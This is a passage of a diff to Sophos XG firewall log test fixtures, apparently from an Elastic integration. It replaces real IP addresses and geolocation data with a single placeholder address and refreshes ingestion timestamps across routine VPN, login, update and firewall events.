"175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-28", - "city_name": "Elblag", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Warmia-Masuria", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 19.4195, - "lat": 54.172 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 5617, + "number": 4837, "organization": { - "name": "Orange Polska Spolka Akcyjna" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "83.20.132.250" + "ip": "175.16.199.1" }, - "message": "location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)", + "message": "location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)", "tags": [ "preserve_original_event" ], @@ -3543,8 +3679,8 @@ "testhost.local" ], "ip": [ - "83.20.132.250", - "214.167.51.66" + "175.16.199.1", + "175.16.199.1" ] }, "sophos": { @@ -3552,7 +3688,7 @@ "device_name": "XG230", "log_type": "Event", "log_component": "IPSec", - "localnetwork": "172.17.32.0/19", + "localnetwork": "175.16.199.1/19", "log_subtype": "System", "connectionname": "Location-1", "remotenetwork": "10.84.234.5/32", @@ -3567,12 +3703,12 @@ "name": "testhost.local" }, "client": { - "ip": "83.20.132.250" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566287900Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=83.20.132.250 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)\"", + "ingested": "2021-12-09T13:44:55.715185Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=175.16.199.1 localgateway=\"\" localnetwork=\"175.16.199.1/19\" remoteinterfaceip=175.16.199.1 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)\"", "code": "062511418055", "kind": "event" } @@ -3618,7 +3754,7 @@ }, "event": { "severity": 3, - "ingested": "2021-06-30T11:19:55.566291800Z", + "ingested": "2021-12-09T13:44:55.715209200Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:59 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511318057 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Expire\" priority=Error user_name=\"\" connectionname=\"\" connectiontype=\"0\" localinterfaceip=\"\" localgateway=\"\" localnetwork=\"\" remoteinterfaceip=\"\" remotenetwork=\"\" message=\"IKE_SA timed out before it could be established\"", "code": "062511318057", "kind": "event" @@ -3630,27 +3766,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-20", - "city_name": "Augustów", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Podlasie", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 22.985, - "lat": 53.845 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 5617, + "number": 4837, "organization": { - "name": "Orange Polska Spolka Akcyjna" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "83.9.140.96" + "ip": "175.16.199.1" }, "message": "User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism", "tags": [ @@ -3674,7 +3809,7 @@ "testhost.local" ], "ip": [ - "83.9.140.96" + "175.16.199.1" ] }, "sophos": { @@ -3694,12 +3829,12 @@ "name": "testhost.local" }, "client": { - "ip": "83.9.140.96" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566295300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=83.9.140.96 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715215200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", "code": "063210617704", "kind": "event", "type": [ @@ -3757,7 +3892,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566300300Z", + "ingested": "2021-12-09T13:44:55.715221700Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:01 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=064011517819 log_type=\"Event\" log_component=\"Anti-Virus\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.407794 newversion=1.0.407795 message=\"Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.\"", "code": "064011517819", "kind": "event", @@ -3812,7 +3947,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566305600Z", + "ingested": "2021-12-09T13:44:55.715277500Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:02 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=063411660022 log_type=\"Event\" log_component=\"DHCP Server\" log_subtype=\"System\" status=\"Expire\" priority=Information ipaddress=\"192.168.110.10\" client_physical_address=\"-\" client_host_name=\"\" message=\"Lease 192.168.110.10 expired\" raw_data=\"192.168.110.10\"", "code": "063411660022", "kind": "event" @@ -3824,27 +3959,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Schleidweiler", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.6593, - "lat": 49.8808 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 3320, + "number": 4837, "organization": { - "name": "Deutsche Telekom AG" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "elastic.user@elastic.test.com" }, - "ip": "217.250.157.135" + "ip": "175.16.199.1" }, "message": "User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism", "tags": [ @@ -3868,7 +4002,7 @@ "testhost.local" ], "ip": [ - "217.250.157.135" + "175.16.199.1" ] }, "sophos": { @@ -3888,12 +4022,12 @@ "name": "testhost.local" }, "client": { - "ip": "217.250.157.135" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566312Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=217.250.157.135 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715283800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", "code": "063110617710", "kind": "event", "type": [ @@ -3971,7 +4105,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566319400Z", + "ingested": "2021-12-09T13:44:55.715289700Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:04 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062811617824 log_type=\"Event\" log_component=\"SSL VPN\" log_subtype=\"System\" priority=Information Mode=\"Remote Access\" sessionid=\"\" starttime=0 user_name=\"elastic.user@elastic.test.com\" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status=\"Established\" message=\"SSL VPN User 'elastic.user@elastic.test.com' connected \" timestamp=1589960866 connectionname=\"\" remote_ip=10.82.234.12", "code": "062811617824", "kind": "event" @@ -3983,27 +4117,26 @@ }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Fell", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.7833, - "lat": 49.7667 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 31334, + "number": 4837, "organization": { - "name": "Vodafone Kabel Deutschland GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "name": "hendrikl" }, - "ip": "91.67.201.4" + "ip": "175.16.199.1" }, "message": "User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials", "tags": [ @@ -4027,7 +4160,7 @@ "testhost.local" ], "ip": [ - "91.67.201.4" + "175.16.199.1" ] }, "sophos": { @@ -4048,12 +4181,12 @@ "name": "testhost.local" }, "client": { - "ip": "91.67.201.4" + "ip": "175.16.199.1" }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566326600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=91.67.201.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", + "ingested": "2021-12-09T13:44:55.715295400Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=175.16.199.1 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", "code": "063010517708", "kind": "event", "category": [ @@ -4107,7 +4240,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566334Z", + "ingested": "2021-12-09T13:44:55.715301300Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:06 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=066911518017 log_type=\"Event\" log_component=\"ATP\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.0297 newversion=1.0.0298 message=\"ATP definitions upgraded from 1.0.0297 to 1.0.0298.\"", "code": "066911518017", "kind": "event" @@ -4169,7 +4302,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566341300Z", + "ingested": "2021-12-09T13:44:55.715307100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 syslog_server_name='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", "code": "062009617502", "kind": "event" @@ -4181,20 +4314,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } }, "user": { "name": "root" }, - "ip": "172.66.35.15" + "ip": "175.16.199.1" }, - "message": "User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials", + "message": "User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials", "tags": [ "preserve_original_event" ], @@ -4216,7 +4357,7 @@ "testhost.local" ], "ip": [ - "172.66.35.15" + "175.16.199.1" ] }, "sophos": { @@ -4235,12 +4376,12 @@ "name": "testhost.local" }, "client": { - "ip": "172.66.35.15" + "ip": "175.16.199.1" }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566349Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=172.66.35.15 message=\"User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials\"", + "ingested": "2021-12-09T13:44:55.715313Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"", "code": "062109517507", "kind": "event", "outcome": "failure" @@ -4288,7 +4429,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566356400Z", + "ingested": "2021-12-09T13:44:55.715318800Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:09 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063911517818 log_type=\"Event\" log_component=\"IPS\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=9.17.09 newversion=9.17.10 message=\"IPS definitions upgraded from 9.17.09 to 9.17.10.\"", "code": "063911517818", "kind": "event" @@ -4334,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566363700Z", + "ingested": "2021-12-09T13:44:55.715324800Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:10 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063311617923 log_type=\"Event\" log_component=\"Appliance\" log_subtype=\"System\" priority=Information backup_mode='appliance' message=\"Scheduled backup to appliance is successful.\"", "code": "063311617923", "kind": "event" @@ -4409,7 +4550,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566370900Z", + "ingested": "2021-12-09T13:44:55.715330600Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:20 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062910617703 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"VPN.SSL.Users.elastic\" auth_client=\"IPSec\" auth_mechanism=\"N/A\" reason=\"\" src_ip=10.84.234.38 src_mac=\"\" start_time=1591086575 sent_bytes=0 recv_bytes=0 message=\"User elastic.user@elastic.test.com was logged out of firewall\" name=\"elastic.user@elastic.test.com\" timestamp=1591086576", "code": "062910617703", "kind": "event", @@ -4484,7 +4625,7 @@ "event": { "duration": 164000000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566378200Z", + "ingested": "2021-12-09T13:44:55.715336500Z", "original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", "code": "066811618014", "kind": "event", @@ -4548,7 +4689,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566385500Z", + "ingested": "2021-12-09T13:44:55.715342400Z", "original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", "code": "066811618015", "kind": "event", @@ -4612,7 +4753,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566392800Z", + "ingested": "2021-12-09T13:44:55.715348300Z", "original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", "code": "066811618016", "kind": "event", @@ -4662,7 +4803,7 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566396100Z", + "ingested": "2021-12-09T13:44:55.715354500Z", "original": "device=\"SFW\" date=2018-06-06 time=11:12:10 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=063711517815 log_type=\"Event\" log_component=\"DDNS\" log_subtype=\"System\" status=\"Success\" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason=\"\" message=\"DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.\"", "code": "063711517815", "kind": "event" @@ -4676,7 +4817,7 @@ "port": 80, "bytes": 606, "packets": 5, - "ip": "91.228.167.86" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -4686,26 +4827,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 606, - "ip": "91.228.167.86", + "ip": "175.16.199.1", "packets": 5 }, "rule": { @@ -4715,26 +4855,28 @@ "source": { "nat": { "port": 0, - "ip": "213.167.51.66" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "RU" + "country_iso_code": "CN" }, "as": { - "number": 8905, + "number": 4837, "organization": { - "name": "Digit One LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 62841, "bytes": 459, - "ip": "172.17.34.15", + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", "packets": 6 }, @@ -4775,9 +4917,7 @@ "testhost.local" ], "ip": [ - "172.17.34.15", - "91.228.167.86", - "213.167.51.66" + "175.16.199.1" ] }, "sophos": { @@ -4816,13 +4956,13 @@ "bytes": 459, "mac": "00:00:00:00:00:00", "packets": 6, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "event": { "duration": 11000000000, "severity": 6, - "ingested": "2021-06-30T11:19:55.566401400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715400500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:37.000Z", @@ -4847,7 +4987,7 @@ "port": 53, "bytes": 0, "packets": 0, - "ip": "91.228.165.117" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -4857,26 +4997,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "91.228.165.117", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4886,29 +5025,28 @@ "source": { "nat": { "port": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 49144, "bytes": 0, - "ip": "172.16.66.155", + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", "packets": 0 }, @@ -4949,9 +5087,7 @@ "defaulttest.local" ], "ip": [ - "172.16.66.155", - "91.228.165.117", - "185.8.209.194" + "175.16.199.1" ] }, "sophos": { @@ -4990,13 +5126,13 @@ "bytes": 0, "mac": "00:00:00:00:00:00", "packets": 0, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566406600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715407Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:38.000Z", @@ -5021,7 +5157,7 @@ "port": 4980, "bytes": 0, "packets": 0, - "ip": "172.20.4.52" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -5030,10 +5166,27 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 4980, "bytes": 0, - "packets": 0, - "ip": "172.20.4.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "ruleset": "1", @@ -5043,11 +5196,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 53287, "bytes": 0, + "ip": "175.16.199.1", "mac": "24:01:c7:07:2b:a2", - "packets": 0, - "ip": "172.17.35.113" + "packets": 0 }, "tags": [ "preserve_original_event" @@ -5082,8 +5252,7 @@ "testhost.local" ], "ip": [ - "172.17.35.113", - "172.20.4.52" + "175.16.199.1" ] }, "sophos": { @@ -5116,13 +5285,13 @@ "bytes": 0, "mac": "24:01:c7:07:2b:a2", "packets": 0, - "ip": "172.17.35.113" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566412800Z", - "original": 